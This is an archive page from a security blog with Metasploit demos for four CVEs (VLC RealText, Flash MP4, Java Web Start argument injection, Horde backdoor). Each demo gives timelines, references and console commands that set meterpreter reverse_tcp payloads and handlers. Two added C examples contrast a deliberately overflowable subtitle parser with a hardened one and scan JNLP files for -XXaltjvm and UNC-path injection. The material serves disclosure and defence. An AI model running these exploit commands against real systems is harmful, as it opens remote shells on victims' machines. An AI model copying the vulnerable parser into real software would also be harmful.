Category Archives: Metasploit

All my posts regarding Metasploit framework, auxiliaries, plugins and exploits.

CVE-2008-5036 VLC Media Player RealText Subtitle Overflow Metasploit Demo

Timeline :

Vulnerability found by Tobias Klein
Vulnerability reported to the vendor by Tobias Klein the 2008-11-03
Coordinated public release of the vulnerability the 2008-11-05
Metasploit PoC provided the 2012-03-01

PoC provided by :

Tobias Klein
SkD
juan vazquez

Reference(s) :

CVE-2008-5036
OSVDB-49809
VideoLAN-SA-0810
TKADV2008-011

Affected version(s) :

VLC media player 0.9.5 down to 0.5.0

Tested on Windows XP Pro SP3 with :

VLC 0.9.4

Description :

This module exploits a stack buffer overflow vulnerability in VideoLAN VLC before 0.9.6. The vulnerability exists in the parsing of RealText subtitle files. To exploit it, the module generates two files: a .mp4 file, which is the decoy the victim is tricked into opening, and a .rt file, which is the malicious subtitle that actually triggers the vulnerability. The .rt file must be placed in the same directory as the .mp4 file, because VLC picks up a subtitle file with the same base name from the video's directory.
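The bug class behind this module, as an added example that is not code from the original post, from VLC or from the Metasploit module: a RealText `<time begin="..." end="...">` tag parser written the vulnerable way (an unbounded `sscanf` conversion into fixed-size stack buffers) next to the bounded form that rejects overlong fields, plus a triage check that counts rejected tags in an in-memory .rt file. The buffer size `TIME_LEN`, the function names and the two sample files are assumptions constructed for this example; the page only says the overflow is a stack buffer overflow in RealText subtitle parsing.

```c
#include <stdio.h>
#include <string.h>

/* Assumed size of the per-field stack buffers; the real sizes are not on
   this page and do not matter for the pattern. */
#define TIME_LEN 12

/* Vulnerable pattern: %[^"] carries no field width, so a begin="..." or
   end="..." value longer than TIME_LEN - 1 bytes is written past the
   stack buffers. Kept here only to show the bug class; never call it on
   untrusted input. */
int parse_time_tag_vulnerable(const char *line, char *begin_out, char *end_out)
{
    char begin[TIME_LEN], end[TIME_LEN];
    if (sscanf(line, "<time begin=\"%[^\"]\" end=\"%[^\"]\"", begin, end) != 2)
        return -1;
    strcpy(begin_out, begin);
    strcpy(end_out, end);
    return 0;
}

/* Hardened pattern: each conversion carries a width of TIME_LEN - 1 (11,
   spelled out because widths must be literal inside the format string).
   If a value is longer, sscanf stops after 11 bytes, the closing quote in
   the format then fails to match and fewer than 2 conversions are
   reported, so an overlong tag is rejected instead of truncated or
   overflowed. Caller buffer sizes are checked before copying out. */
int parse_time_tag_safe(const char *line,
                        char *begin_out, size_t begin_sz,
                        char *end_out, size_t end_sz)
{
    char begin[TIME_LEN], end[TIME_LEN];
    if (sscanf(line, "<time begin=\"%11[^\"]\" end=\"%11[^\"]\"", begin, end) != 2)
        return -1;
    if (strlen(begin) >= begin_sz || strlen(end) >= end_sz)
        return -1;
    strcpy(begin_out, begin);
    strcpy(end_out, end);
    return 0;
}

/* Wrapper that parses into locally sized buffers and returns only the
   verdict: 0 accepted, -1 rejected. */
int time_tag_verdict(const char *line)
{
    char begin[TIME_LEN], end[TIME_LEN];
    return parse_time_tag_safe(line, begin, sizeof begin, end, sizeof end);
}

/* Triage check for a whole .rt file held in memory: count the <time ...>
   tags the bounded parser rejects. A non-zero count for a subtitle file
   that arrived next to a video is a reason not to open it with an
   unpatched player. */
int count_rejected_time_tags(const char *rt)
{
    int rejected = 0;
    const char *p = rt;
    while ((p = strstr(p, "<time")) != NULL) {
        if (time_tag_verdict(p) != 0)
            rejected++;
        p += strlen("<time");
    }
    return rejected;
}

/* Constructed sample files (not taken from any real exploit). */
const char RT_BENIGN[] =
    "<window duration=\"00:10\">\n"
    "<time begin=\"00:00.0\" end=\"00:02.5\">Hello\n"
    "<time begin=\"00:03.0\" end=\"00:05.0\">World\n"
    "</window>\n";

const char RT_OVERLONG[] =
    "<window duration=\"00:10\">\n"
    "<time begin=\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\" end=\"00:02.5\">x\n"
    "</window>\n";

int main(void)
{
    printf("benign file: %d rejected tag(s)\n", count_rejected_time_tags(RT_BENIGN));
    printf("overlong file: %d rejected tag(s)\n", count_rejected_time_tags(RT_OVERLONG));
    return 0;
}
```

The hardened parser relies on a detail of `sscanf` worth remembering: a width-limited `%[...]` conversion that hits its limit leaves the rest of the value in the input, so the next literal in the format fails to match and the short return value exposes the truncation. Silently truncating (`%11s` with no follow-up check) would hide the fact that the file was malformed.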

Commands :

use exploit/windows/fileformat/vlc_realtext
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit -j

sysinfo
getuid

CVE-2012-0754 Adobe Flash Player MP4 Overflow Metasploit Demo

Timeline :

Vulnerability found by Alexander Gavrun from ZDI
Vulnerability reported to the vendor by ZDI the 2012-01-12
Coordinated public release of the vulnerability the 2012-02-15
Vulnerability found exploited in the wild by contagio the 2012-03-02
Metasploit PoC provided the 2012-03-07

PoC provided by :

Alexander Gavrun
sinn3r
juan vazquez

Reference(s) :

CVE-2012-0754
OSVDB-79300
APSB12-03
ZDI-12-080
contagio

Affected version(s) :

Adobe Flash Player 11.1.102.55 and earlier versions for Windows, Macintosh, Linux and Solaris operating systems
Adobe Flash Player 11.1.112.61 and earlier versions for Android 4.x, and Adobe Flash Player 11.1.111.5 and earlier versions for Android 3.x and 2.x

Tested on Windows XP Pro SP3 with :

Adobe Flash Player 11.1.102.55
Internet Explorer 8

Description :

This module exploits a vulnerability found in Adobe Flash Player. By supplying a corrupt .mp4 file that Flash loads, it is possible to gain arbitrary remote code execution in the context of the user running the browser. This vulnerability has been exploited in the wild as part of the “Iran’s Oil and Nuclear Situation.doc” e-mail attack.

Commands :

use exploit/windows/browser/adobe_flash_mp4_cprt
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

CVE-2012-0500 Oracle Java Web Start Plugin Command Line Argument Injection Metasploit Demo

Timeline :

Vulnerability “ZDI-12-037” reported by Chris Ries to ZDI
Vulnerability reported to the vendor by ZDI the 2011-10-28 for “ZDI-12-037”
Coordinated public release of the vulnerability the 2012-02-22
Metasploit PoC provided the 2012-02-23

PoC provided by :

jduck

Reference(s) :

CVE-2012-0500
OSVDB-79227
ZDI-12-037
TSL20120214-01
Oracle Java SE Critical Patch Update Advisory – February 2012

Affected version(s) :

Oracle Java Development Kit (JDK) 6 Update 30 and prior
Oracle Java Development Kit (JDK) 7 Update 2 and prior
Oracle JavaFX 2.0.2 and prior
Oracle Java Runtime Environment (JRE) 6 Update 30 and prior
Oracle Java Runtime Environment (JRE) 7 Update 2 and prior

Tested on Windows XP Pro SP3 with :

Java 6 Update 30
Internet Explorer 8

Description :

This module exploits a flaw in the Web Start component of the Sun Java Runtime Environment. The arguments passed to Java Web Start are not properly validated, allowing injection of arbitrary arguments to the JVM. By using the lesser-known -J option, an attacker can take advantage of the -XXaltjvm option, as discussed previously by Ruben Santamarta, to make the JVM load an attacker-supplied runtime library. This allows an attacker to execute arbitrary code in the context of an unsuspecting browser user. For this module to work, it must be run as root (the library is served from a WebDAV share on a privileged port) on a server that does not serve SMB (the Windows redirector only falls back to WebDAV once its SMB connection to the host fails). Additionally, the target host must have the WebClient service (WebDAV Mini-Redirector) enabled.
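A content check for the injection described above, as an added example that is not code from the original post or from the Metasploit module: it scans an in-memory JNLP document for JVM argument tokens of the kind the attack needs. It assumes the injected arguments reach the launcher through the JNLP `java-vm-args` attribute (the page names only the -J and -XXaltjvm options, so that attribute, the function names and the sample documents are assumptions of this example), and it goes slightly beyond the text by also flagging bare UNC paths, the form a WebDAV-served library path takes on the target.

```c
#include <stdio.h>
#include <string.h>

/* Upper bound on the attribute value we copy out; longer values are
   truncated rather than overflowed. */
#define VMARGS_MAX 1024

/* One JVM argument token is suspicious if it is one of the pieces the
   attack relies on: a -J prefix (hands the rest straight to the launcher),
   -XXaltjvm (loads an alternate JVM library from a chosen path) or a UNC
   path (reached through the WebClient/WebDAV redirector). */
int token_is_suspicious(const char *tok)
{
    if (strncmp(tok, "-J", 2) == 0) return 1;
    if (strstr(tok, "-XXaltjvm") != NULL) return 1;
    if (strncmp(tok, "\\\\", 2) == 0) return 1;
    return 0;
}

/* Count suspicious tokens across every java-vm-args="..." (or '...')
   attribute in the document. Deliberately plain string matching: deciding
   to block a file at a proxy does not need a full XML parser. */
int count_suspicious_vmargs(const char *jnlp)
{
    const char needle[] = "java-vm-args=";
    int found = 0;
    const char *p = jnlp;
    while ((p = strstr(p, needle)) != NULL) {
        p += sizeof needle - 1;
        char quote = *p;
        if (quote != '"' && quote != '\'')
            continue;                       /* unquoted: not a valid attribute */
        p++;
        const char *close = strchr(p, quote);
        if (close == NULL)
            break;                          /* unterminated value: stop scanning */
        size_t len = (size_t)(close - p);
        if (len >= VMARGS_MAX)
            len = VMARGS_MAX - 1;           /* bound the copy */
        char buf[VMARGS_MAX];
        memcpy(buf, p, len);
        buf[len] = '\0';
        for (char *tok = strtok(buf, " \t\r\n"); tok != NULL; tok = strtok(NULL, " \t\r\n"))
            found += token_is_suspicious(tok);
        p = close + 1;
    }
    return found;
}

/* Constructed sample documents (not taken from any real exploit). */
const char JNLP_BENIGN[] =
    "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n"
    "<jnlp spec=\"1.0+\" codebase=\"http://example.invalid/\">\n"
    "  <resources>\n"
    "    <j2se version=\"1.6+\" java-vm-args=\"-Xmx256m -Dapp.mode=demo\"/>\n"
    "    <jar href=\"app.jar\"/>\n"
    "  </resources>\n"
    "  <application-desc main-class=\"Main\"/>\n"
    "</jnlp>\n";

/* Same layout, but the vm args smuggle a -J option that points -XXaltjvm
   at a UNC path; in memory the path reads \\192.0.2.10\share. */
const char JNLP_HOSTILE[] =
    "<jnlp spec=\"1.0+\" codebase=\"http://example.invalid/\">\n"
    "  <resources>\n"
    "    <j2se version=\"1.6+\" java-vm-args=\"-Xmx256m -J-XXaltjvm=\\\\192.0.2.10\\share\"/>\n"
    "  </resources>\n"
    "</jnlp>\n";

/* Single-quoted attribute with the option given directly. */
const char JNLP_HOSTILE_ALT[] =
    "<jnlp><resources>"
    "<j2se version='1.6+' java-vm-args='-XXaltjvm=\\\\192.0.2.10\\share'/>"
    "</resources></jnlp>";

int main(void)
{
    printf("benign: %d\n", count_suspicious_vmargs(JNLP_BENIGN));
    printf("hostile: %d\n", count_suspicious_vmargs(JNLP_HOSTILE));
    printf("hostile (alt): %d\n", count_suspicious_vmargs(JNLP_HOSTILE_ALT));
    return 0;
}
```

A token is counted once even when it matches several rules, so the count is the number of offending arguments, not the number of rules hit. Pair this check with the precondition the description states: a host whose WebClient service is disabled cannot be made to fetch the library over WebDAV in the first place.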

Commands :

use exploit/windows/browser/java_ws_vmargs
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

CVE-2012-0209 Horde 3.3.12 Backdoor Metasploit Demo

Timeline :

Public release of the vulnerability the 2012-02-13
Details of the vulnerability and first PoC disclosed by Eric Romang the 2012-02-15
Metasploit PoC provided by jduck the 2012-02-16

PoC provided by :

Eric Romang
jduck

Reference(s) :

CVE-2012-0209

Affected version(s) :

Horde 3.3.12 downloaded between November 15, 2011 and February 7, 2012
Horde Groupware 1.2.10 downloaded between November 9, 2011 and February 7, 2012
Horde Groupware Webmail Edition 1.2.10 downloaded between November 2, 2011 and February 7, 2012

Tested on Ubuntu 11.10 with :

Horde 3.3.12

Description :

This module exploits an arbitrary PHP code execution vulnerability introduced as a backdoor into Horde 3.3.12 and Horde Groupware 1.2.10; it is not a coding mistake but code planted in the distributed archives, so only installs built from a download made during the affected window are exposed.

Commands :

use exploit/multi/http/horde_href_backdoor
set VHOST devnull.zataz.loc
set RHOST 192.168.178.100
set PAYLOAD cmd/unix/generic
set CMD uname -a
exploit